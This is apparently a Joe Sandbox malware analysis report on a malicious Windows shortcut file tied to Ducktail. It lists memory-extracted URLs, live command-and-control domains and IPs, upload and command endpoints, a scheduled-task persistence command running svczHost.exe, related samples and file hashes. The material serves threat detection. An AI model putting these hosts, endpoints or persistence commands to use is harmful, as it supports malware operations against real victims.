http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.3472549645.0000020C68EA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3487490878.0000020C77A34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3487490878.0000020C77B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3742325021.000001F390078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3742325021.000001F39021B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3633648179.000001B590079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4144913601.00000166901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.00000166814F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.c9	powershell.exe, 00000008.00000002.3643874588.000001B5FCF92000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d	powershell.exe, 00000003.00000002.3702779169.000001F380E98000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000008.00000002.3597293545.000001B58114F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B580D96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.00000166809B8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/MartinKuschnik/WmiLight	svczHost.exe, 00000014.00000002.4757589094.000001B902A48000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.pngh	powershell.exe, 00000002.00000002.3472549645.0000020C68D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3472549645.0000020C68D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5	powershell.exe, 00000008.00000002.3597293545.000001B580C5D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/nativeaot-compatibilityy	powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	false		high
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd0	powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/Icon	powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/7fd1a89d0020dcffe37c334092d29597499af8b82a4f37fb75f7f3a0a1257f1e979bdbe	powershell.exe, 00000003.00000002.3702779169.000001F3806EA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://cocomethode.de:443/	svczHost.exe, 00000014.00000002.4755964850.000001B9020BA000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4755964850.000001B9020A9000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mi	powershell.exe, 00000003.00000002.3756553973.000001F3FBE40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7a	powershell.exe, 0000000D.00000002.3932623749.000002A482942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A483D5E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/nativeaot-compatibilityY	svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pesterh	powershell.exe, 00000002.00000002.3472549645.0000020C68D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3472549645.0000020C68D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.htmlh	powershell.exe, 00000002.00000002.3472549645.0000020C68D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3472549645.0000020C68D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5814CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c	powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microsoft.c7	powershell.exe, 00000008.00000002.3643874588.000001B5FCF92000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXzT	powershell.exe, 00000002.00000002.3472549645.0000020C67BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	powershell.exe, 00000002.00000002.3490034644.0000020C7FA90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3752962645.000001F3FBAB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3642064416.000001B5FCBF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4419408500.000002A49A5E9000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4754714057.000001B8FEF3E000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000003.4296169846.000001B8FEF7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/GlobalizationInvariantMode	powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exe	false		high
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.3472549645.0000020C679B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.0000016680001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000008.00000002.3597293545.000001B58137D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b904	powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.1.51	cocomethode.de	United States		13335	CLOUDFLARENETUS	true
23.88.71.29	unknown	United States		18978	ENZUINC-US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573016
Start date and time:	2024-12-11 12:26:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0A3NB8ot11.lnk
Detection:	MAL
Classification:	mal100.troj.expl.evad.winLNK@80/61@1/2
EGA Information:	Successful, ratio: 10%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 52.109.0.91, 52.111.227.14, 52.113.194.132, 20.189.173.28, 64.233.176.94, 20.190.157.15
Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, onedscolprdwus18.westus.cloudapp.azure.com, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, wus-azsc-config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, www.gstatic.com, nexusrules.officeapps.live.com
Execution Graph export aborted for target myRdpService.exe, PID 2236 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1804 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2828 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6248 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7116 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8600 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8792 because it is empty
Execution Graph export aborted for target powershell.exe, PID 9136 because it is empty
Execution Graph export aborted for target svczHost.exe, PID 6444 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:28:55	API Interceptor	273x Sleep call for process: powershell.exe modified
06:30:56	API Interceptor	9x Sleep call for process: myRdpService.exe modified
12:29:40	Task Scheduler	Run new task: zServicecakoi10 path: C:\Windows\Temp\svczHost.exe s>cakoi10 cocomethode.de

LLM Input / Output

Input	Output
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 15 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 16 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 13 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 19 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 20 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 22 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 17 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 18 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 13 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 17 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 15 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 19 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 18 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 16 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 22 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 20 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 21 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 21 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.1.51	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
104.21.1.51	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
23.88.71.29	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	kingsmaker_4.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/command/ws
	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cocomethode.de	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://balmyrind.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	print preview.js	Get hash	malicious	FormBook	Browse	172.67.187.200
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
ENZUINC-US	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	104.203.163.1
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	104.202.51.86
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.89.70.126
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	104.202.0.10
	kingsmaker_4.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29
	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	print preview.js	Get hash	malicious	FormBook	Browse	104.21.1.51
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\myRdpService.exe	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse
C:\Windows\Temp\myRdpService.exe	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse
C:\Windows\Temp\svczHost.exe	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse

Created / dropped Files

C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.860260878223841
Encrypted:	false
SSDEEP:	48:uiTrlKxsxxsxl9Il8uBbD5E5IuOTamcd1rc:vgYXbD5E8J
MD5:	3B1EC1FA83A1419C5DCB52E93CD90159
SHA1:	6A57D672552A9A7C3287C9E601FD02463C45269A
SHA-256:	8F9B76C5FE6F4A796EDE987B3B762D4E959D3485CED54E7E537D4E8BA025270C
